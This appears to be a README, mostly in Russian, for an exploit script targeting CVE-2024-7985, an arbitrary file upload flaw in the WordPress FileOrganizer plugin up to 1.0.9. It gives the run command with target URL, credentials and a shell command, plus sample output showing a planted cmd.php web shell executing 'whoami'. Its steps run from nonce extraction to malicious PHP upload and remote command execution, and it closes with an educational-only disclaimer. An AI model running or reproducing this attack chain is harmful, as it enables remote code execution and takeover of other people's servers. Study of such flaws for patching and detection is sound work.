
FileOrganizer <= 1.0.9 - Аутентифицированная (подписчик+) произвольная загрузка файлов
FileOrganizer <= 1.0.9 - Аутентифицированная (Subscriber+) произвольная загрузка файлов
CVE-2024-7985 - плагин WordPress FileOrganizer <= 1.0.9 уязвим для аутентифицированной произвольной загрузки файлов, что позволяет злоумышленникам с правами Subscriber+ загружать и выполнять вредоносные файлы удаленно. Эта уязвимость возникает из-за отсутствия проверки типа файла в функции fileorganizer_ajax_handler, что делает возможным удаленное выполнение кода (RCE).
🚨 Этот эксплойт позволяет злоумышленникам выполнять произвольные команды на сервере! 🚨
requestsbeautifulsoup4Установка зависимостей:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Обнаружена уязвимая версия: 1.0.9
[+] Успешный вход в систему!
[+] Извлечен nonce: 7b4a95872b
[+] Файл успешно загружен!
[+] Доступ к файлу по адресу: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ Проверка версии - Определяет, уязвим ли сайт.
2️⃣ Аутентификация - Вход в WordPress.
3️⃣ Извлечение nonce - Получение токена безопасности.
4️⃣ Загрузка файла - Загрузка вредоносного PHP-скрипта.
5️⃣ Выполнение команды - Выполнение указанных пользователем команд.
Этот скрипт предназначен только для образовательных целей; автор не несет ответственности за любое неправомерное использование или последствия. 🚨